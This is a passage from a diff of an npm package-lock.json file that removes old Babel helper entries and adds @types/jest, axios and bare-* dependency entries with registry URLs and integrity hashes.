"https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.15.0" + "@sinclair/typebox": "^0.34.0" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-module-imports": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.14.5.tgz", - "integrity": "sha512-SwrNHu5QWS84XlHwGYPDtCxcA0hrSlL2yhWYLgeOc0w7ccOl2qv4s/nARI0aYZW+bSwAL5CukeXA47B/1NKcnQ==", + "node_modules/@types/jest/node_modules/@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.14.5" + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", + "@types/node": "*", + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.15.0.tgz", - "integrity": "sha512-RkGiW5Rer7fpXv9m1B3iHIFDZdItnO2/BLfWVW/9q7+KqQSDY5kUfQEbzdXM1MVhJGcugKV7kRrNVzNxmk7NBg==", + "node_modules/@types/jest/node_modules/@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", "dev": true, - "dependencies": { - "@babel/helper-module-imports": "^7.14.5", - "@babel/helper-replace-supers": "^7.15.0", - "@babel/helper-simple-access": "^7.14.8", - "@babel/helper-split-export-declaration": "^7.14.5", - "@babel/helper-validator-identifier": "^7.14.9", - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" - }, - "engines": { - "node": ">=6.9.0" - } + "license": "MIT" }, - "node_modules/@babel/helper-optimise-call-expression": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-optimise-call-expression/-/helper-optimise-call-expression-7.14.5.tgz", - "integrity": "sha512-IqiLIrODUOdnPU9/F8ib1Fx2ohlgDhxnIDU7OEVi+kAbEZcyiF7BLU8W6PfvPi9LzztjS7kcbzbmL7oG8kD6VA==", + "node_modules/@types/jest/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true, - "dependencies": { - "@babel/types": "^7.14.5" - }, + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.20.2.tgz", - "integrity": "sha512-8RvlJG2mj4huQ4pZ+rU9lqKi9ZKiRmuvGuM2HlWmkmgOhbs6zEAw6IEiJ5cQqGbDzGZOhwuOQNtZMi/ENLjZoQ==", + "node_modules/@types/jest/node_modules/ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=8" } }, - "node_modules/@babel/helper-replace-supers": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-replace-supers/-/helper-replace-supers-7.15.0.tgz", - "integrity": "sha512-6O+eWrhx+HEra/uJnifCwhwMd6Bp5+ZfZeJwbqUTuqkhIT6YcRhiZCOOFChRypOIe0cV46kFrRBlm+t5vHCEaA==", + "node_modules/@types/jest/node_modules/expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-member-expression-to-functions": "^7.15.0", - "@babel/helper-optimise-call-expression": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-simple-access": { - "version": "7.14.8", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.14.8.tgz", - "integrity": "sha512-TrFN4RHh9gnWEU+s7JloIho2T76GPwRHhdzOWLqTrMnlas8T9O7ec+oEDNsRXndOmru9ymH9DFrEOxpzPoSbdg==", + "node_modules/@types/jest/node_modules/jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.14.8" + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", + "node_modules/@types/jest/node_modules/jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", + "node_modules/@types/jest/node_modules/jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", "dev": true, + "license": "MIT", + "dependencies": { + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" + }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", + "node_modules/@types/jest/node_modules/jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", "dev": true, + "license": "MIT", + "dependencies": { + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" + }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-validator-option": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.14.5.tgz", - "integrity": "sha512-OX8D5eeX4XwcroVW45NMvoYaIuFI+GQpA2a8Gi+X/U/cDUIRsV37qQfF905F0htTRCREQIB4KqPeaveRJUl3Ow==", + "node_modules/@types/jest/node_modules/picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", "dev": true, + "license": "MIT", "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.15.3", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.15.3.tgz", - "integrity": "sha512-HwJiz52XaS96lX+28Tnbu31VeFSQJGOeKHJeaEPQlTl7PnlhFElWPj8tUXtqFIzeN86XxXoBr+WFAyK2PPVz6g==", - "dev": true, - "dependencies": { - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" + "node": ">=12" }, - "engines": { - "node": ">=6.9.0" + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", + "node_modules/@types/jest/node_modules/pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "node_modules/@types/js-yaml": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.2.tgz", + "integrity": "sha512-KbeHS/Y4R+k+5sWXEYzAZKuB1yQlZtEghuhRxrVRLaqhtoG5+26JwQsa4HyS3AWX8v1Uwukma5HheduUDskasA==" + }, + "node_modules/@types/lodash": { + "version": "4.14.172", + "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.172.tgz", + "integrity": "sha512-/BHF5HAx3em7/KkzVKm3LrsD6HZAXuXO1AJZQ3cRRBZj4oHZDviWPYu0aEplAqDFNHZPW6d3G7KN+ONcCCC7pw==", + "dev": true + }, + "node_modules/@types/mustache": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.1.2.tgz", + "integrity": "sha512-c4OVMMcyodKQ9dpwBwh3ofK9P6U9ZktKU9S+p33UqwMNN1vlv2P0zJZUScTshnx7OEoIIRcCFNQ904sYxZz8kg==", + "dev": true + }, + "node_modules/@types/node": { + "version": "22.16.2", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.2.tgz", + "integrity": "sha512-Cdqa/eJTvt4fC4wmq1Mcc0CPUjp/Qy2FGqLza3z3pKymsI969TcZ54diNJv8UYUgeWxyb8FSbCkhdR6WqmUFhA==", "dev": true, + "license": "MIT", "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" + "undici-types": "~6.21.0" } }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", "dev": true, + "license": "MIT", "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" + "@types/node": "*", + "form-data": "^4.0.0" } }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/@types/nodemailer": { + "version": "6.4.4", + "resolved": "https://registry.npmjs.org/@types/nodemailer/-/nodemailer-6.4.4.tgz", + "integrity": "sha512-Ksw4t7iliXeYGvIQcSIgWQ5BLuC/mljIEbjf615svhZL10PE9t+ei8O9gDaD3FPCasUJn9KTLwz2JFJyiiyuqw==", "dev": true, "dependencies": { - "color-name": "1.1.3" + "@types/node": "*" } }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", + "node_modules/@types/nunjucks": { + "version": "3.1.5", + "resolved": "https://registry.npmjs.org/@types/nunjucks/-/nunjucks-3.1.5.tgz", + "integrity": "sha512-0zEdmQNNvQ+xyV9kqQvAV93UVroTwhE78toVUDT0GBnGcW2jQBZnB4al9qq2LqI5qHOqROy/DvvAY/UwrbvV1A==", "dev": true }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", "dev": true, - "engines": { - "node": ">=0.8.0" - } + "license": "MIT" }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", "dev": true, - "engines": { - "node": ">=4" + "license": "MIT", + "dependencies": { + "@types/node": "*" } }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", "dev": true, + "license": "MIT", "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" + "@types/yargs-parser": "*" } }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", + "node_modules/@types/yargs-parser": { + "version": "20.2.1", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", + "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", + "dev": true + }, + "node_modules/a-sync-waterfall": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/a-sync-waterfall/-/a-sync-waterfall-1.0.1.tgz", + "integrity": "sha512-RYTOHHdWipFUliRFMCS4X2Yn2X8M87V/OpSqWzKKOGhzqyUxzyVmhHDH9sAvG+ZuQf/TAOFsLCpMw09I1ufUnA==" + }, + "node_modules/agent-base": { + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", + "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, + "license": "MIT", "engines": { - "node": ">=6.0.0" + "node": ">= 14" } }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", + "node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "dev": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "color-convert": "^2.0.1" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "engines": { + "node": ">=8" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, + "node_modules/argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" + }, + "node_modules/asap": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/asap/-/asap-2.0.6.tgz", + "integrity": "sha1-5QNHYR1+aQlDIIu9r+vLwvuGbUY=" + }, + "node_modules/asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" + }, + "node_modules/axios": { + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/axios/-/axios-1.10.0.tgz", + "integrity": "sha512-/1xYAC4MP/HEG+3duIhFr4ZQXR4sQXOIe+o6sdqzeykGLx6Upp/1p8MHqhINOvGeP7xyNHe7tsiJByc4SSVUxw==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "follow-redirects": "^1.15.6", + "form-data": "^4.0.0", + "proxy-from-env": "^1.1.0" } }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "license": "Apache-2.0" }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "node_modules/bare-events": { + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.6.0.tgz", + "integrity": "sha512-EKZ5BTXYExaNqi3I3f9RtEsaI/xBSGjE0XZCZilPzFAV/goswFHuPd9jEZlPIZ/iNZJwDSao9qRiScySz7MbQg==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "license": "Apache-2.0", + "optional": true }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.18.6.tgz", - "integrity": "sha512-6mmljtAedFGTWu2p/8WIORGwy+61PLgOMPOdazc7YoJ9ZCWUyFy3A6CpPkRKLKD1ToAesxX8KGEViAiLo9N+7Q==", + "node_modules/bare-fs": { + "version": "4.1.6", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.6.tgz", + "integrity": "sha512-25RsLF33BqooOEFNdMcEhMpJy8EoR88zSMrnOQOaM3USnOK2VmaJ1uaQEwPA6AQjrv1lXChScosN6CzbwbO9OQ==", "dev": true, + "license": "Apache-2.0", + "optional": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.18.6" + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" }, "engines": { - "node": ">=6.9.0" + "bare": ">=1.16.0" }, "peerDependencies": { - "@babel/core": "^7.0.0-0" + "bare-buffer": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + } } }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", + "node_modules/bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "license": "Apache-2.0", + "optional": true, + "engines": { + "bare": ">=1.14.0" } }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", + "node_modules/bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", "dev": true, + "license": "Apache-2.0", + "optional": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "bare-os": "^3.0.1" } }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", "dev": true, + "license": "Apache-2.0", + "optional": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "streamx": "^2.21.0" }, "peerDependencies": { - "@babel/core": "^7.0.0-0" + "bare-buffer": "*", + "bare-events": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } } }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": 